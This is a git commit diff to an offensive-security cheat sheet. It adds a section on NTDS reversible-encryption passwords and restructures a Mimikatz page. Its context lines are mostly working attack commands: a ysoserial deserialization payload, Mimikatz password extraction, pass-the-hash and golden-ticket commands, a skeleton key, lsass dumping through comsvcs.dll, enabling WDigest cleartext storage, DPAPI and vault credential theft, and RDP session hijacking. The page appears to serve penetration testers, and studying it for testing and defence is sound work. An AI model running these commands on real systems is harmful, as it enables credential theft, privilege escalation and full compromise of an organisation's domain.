NTDS Reversible Encryption

This commit is contained in:
Swissky 2022-11-11 14:52:56 +01:00
parent 4ca065f8ed
commit 5966c3a21b
3 changed files with 82 additions and 53 deletions

View file

@ -83,6 +83,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
### JSON.NET
* In C# source code, look for `JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings`.
* Payload output: **JSON**
```ps1

View file

@ -40,6 +40,7 @@
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
- [User Hunting](#user-hunting)
- [Password spraying](#password-spraying)
- [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
@ -482,12 +483,13 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
* RPCClient
```powershell
# remote
rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
# loc
```
* WMI
```powershell
wmic useraccount get name,sid
Administrator S-1-5-21-3415849876-833628785-5197346142-500
Guest S-1-5-21-3415849876-833628785-5197346142-501
@ -495,11 +497,13 @@ Administrator S-1-5-21-297520375-2634728305-5197346142-500
Guest S-1-5-21-297520375-2634728305-5197346142-501
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
lambda S-1-5-21-297520375-2634728305-5197346142-1110
# powerview
```
* Powerview
```powershell
Convert-NameToSid high-sec-corp.localkrbtgt
S-1-5-21-2941561648-383941485-1389968811-502
```
* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid`
```bash
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
@ -1329,6 +1333,22 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
- [crackstation.net](https://crackstation.net)
- [hashes.com](https://hashes.com/en/decrypt/hash)
#### NTDS Reversible Encryption
`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form.
The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.
This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.
* List users with "Store passwords using reversible encryption" enabled
```powershell
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
```
The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT.
### User Hunting
Sometimes you need to find a machine where a specific user is logged in.

View file

@ -2,25 +2,25 @@
## Summary
* [Mimikatz - Execute commands](#mimikatz---execute-commands)
* [Mimikatz - Extract passwords](#mimikatz---extract-passwords)
* [Mimikatz - LSA Protection Workaround](#mimikatz---lsa-protection-workaround)
* [Mimikatz - Mini Dump](#mimikatz---mini-dump)
* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)
* [Mimikatz - Golden ticket](#mimikatz---golden-ticket)
* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
* [Execute commands](#execute-commands)
* [Extract passwords](#extract-passwords)
* [LSA Protection Workaround](#lsa-protection-workaround)
* [Mini Dump](#mini-dump)
* [Pass The Hash](#pass-the-hash)
* [Golden ticket](#golden-ticket)
* [Skeleton key](#skeleton-key)
* [RDP session takeover](#rdp-session-takeover)
* [Credential Manager & DPAPI](#credential-manager--dpapi)
* [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials)
* [Vault](#vault)
* [Mimikatz - Commands list](#mimikatz---commands-list)
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
* [Commands list](#commands-list)
* [Powershell version](#powershell-version)
* [References](#references)
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
## Mimikatz - Execute commands
## Execute commands
Only one command
@ -38,7 +38,7 @@ mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
```
## Mimikatz - Extract passwords
## Extract passwords
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
@ -63,7 +63,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
* Adding requires lock
* Removing requires reboot
## Mimikatz - LSA Protection Workaround
## LSA Protection Workaround
- LSA as a Protected Process (RunAsPPL)
```powershell
@ -108,7 +108,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
```
## Mimikatz - Mini Dump
## Mini Dump
Dump the lsass process with `procdump`
@ -132,22 +132,22 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
```
Then load it inside Mimikatz.
Use the minidump:
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
```powershell
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
```
* Pypykatz: `pypykatz lsa minidump lsass.dmp`
## Mimikatz - Pass The Hash
## Pass The Hash
```powershell
mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
```
## Mimikatz - Golden ticket
## Golden ticket
```powershell
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
@ -157,7 +157,7 @@ mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe15
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
```
## Mimikatz - Skeleton key
## Skeleton key
```powershell
privilege::debug
@ -168,18 +168,26 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
```
## Mimikatz - RDP session takeover
## RDP session takeover
Use `ts::multirdp` to patch the RDP service to allow more than two users.
Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
* Enable privileges
```powershell
privilege::debug
token::elevate
```
* List RDP sessions
```powershell
ts::sessions
```
* Hijack session
```powershell
ts::remote /id:2
```
Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password.
```powershell
# get the Session ID you want to hijack
query user
@ -188,7 +196,7 @@ net start sesshijack
```
## Mimikatz - Credential Manager & DPAPI
## Credential Manager & DPAPI
```powershell
# check the folder to find credentials
@ -235,7 +243,7 @@ Attributes : 0
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
```
## Mimikatz - Commands list
## Commands list
| Command |Definition|
|:----------------:|:---------------|
@ -262,7 +270,7 @@ vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
## Mimikatz - Powershell version
## Powershell version
Mimikatz in memory (no binary on disk) with :